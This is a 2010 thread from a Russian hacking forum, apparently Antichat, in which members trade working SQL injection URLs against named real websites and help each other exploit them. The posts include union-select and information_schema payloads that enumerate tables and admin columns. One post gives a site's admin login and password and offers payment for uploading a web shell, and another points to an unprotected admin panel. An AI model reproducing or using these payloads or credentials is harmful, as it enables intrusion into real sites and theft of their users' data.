 |
|
16.06.2010, 14:38
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Обычная скуля, 4 колонки, без вывода
http://www.collegedates.com/selectschool/?section=signup&schoolid=731+union+select+111,222, 333,444+--+&sid=
|
|
|
16.06.2010, 14:42
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от durito
хитромудрая скуль и походу тут не mysql
http://www.collegedates.com/selectschool/?section=signup&schoolid=731+and+1=1&sid=
помогите с советом
mysql 5й ветки, слепая инъекция.
>> помогите советом
Советую почитать статьи.
|
|
|
|
16.06.2010, 14:45
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от durito
хитромудрая скуль и походу тут не mysql
http://www.collegedates.com/selectschool/?section=signup&schoolid=731+and+1=1&sid=
помогите с советом
http://www.collegedates.com/selectschool/?section=signup&schoolid=731+union+select+1,2,3,4--+
Как бы там blind
|
|
|
|
16.06.2010, 14:53
|
|
Новичок
Регистрация: 10.08.2009
Сообщений: 16
С нами:
8816848
Репутация:
1
|
|
Сообщение от wildshaman
В четвертой версии таблицы только брутить.
SIPT умеет, Toolza тоже умеет.
к сожелению он тоже не помог((
|
|
|
|
16.06.2010, 14:58
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Делаем несколько магических движений, а потом "ТУПО" заламываемся в админку без пароля http://www.collegedates.com/admin/
|
|
|
|
16.06.2010, 16:38
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
http://www.collegedates.com/selectschool/?section=signup&schoolid=99999+union+select+1,2,ta ble_name,4+from+information_schema.tables+limit+15 ,1--
где тут blind емае
|
|
|
|
16.06.2010, 16:54
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Есть админскии логин и пароль _http://lp.pesgame.net g@l@g@n:7C6aizlP
Есть скуля _http://lp.pesgame.net/index.php?cmd=table&lid=14'
Есть функции залива аватарки,пробывал залить шелл нефига не вышло.Может у кого-то выйдет,заплюсую до смерти +5wmz .
|
|
|
|
16.06.2010, 17:21
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.infotula.ru/forum/ прошу помочь определить движок форума...
|
|
|
|
16.06.2010, 17:28
|
|
Новичок
Регистрация: 10.08.2009
Сообщений: 16
С нами:
8816848
Репутация:
1
|
|
Сообщение от Gorev
http://www.infotula.ru/forum/ прошу помочь определить движок форума...
вроде самописный
|
|
|
|
16.06.2010, 18:49
|
|
Новичок
Регистрация: 10.12.2007
Сообщений: 11
С нами:
9694063
Репутация:
1
|
|
посоветуйте как вывести данные по следующим колонкам id, name, password
_http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+column_name,2+from+INFORMATION_SCH EMA.COLUMNS+where+table_name=0x41444D494E555345525 3+limit+0,4--
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
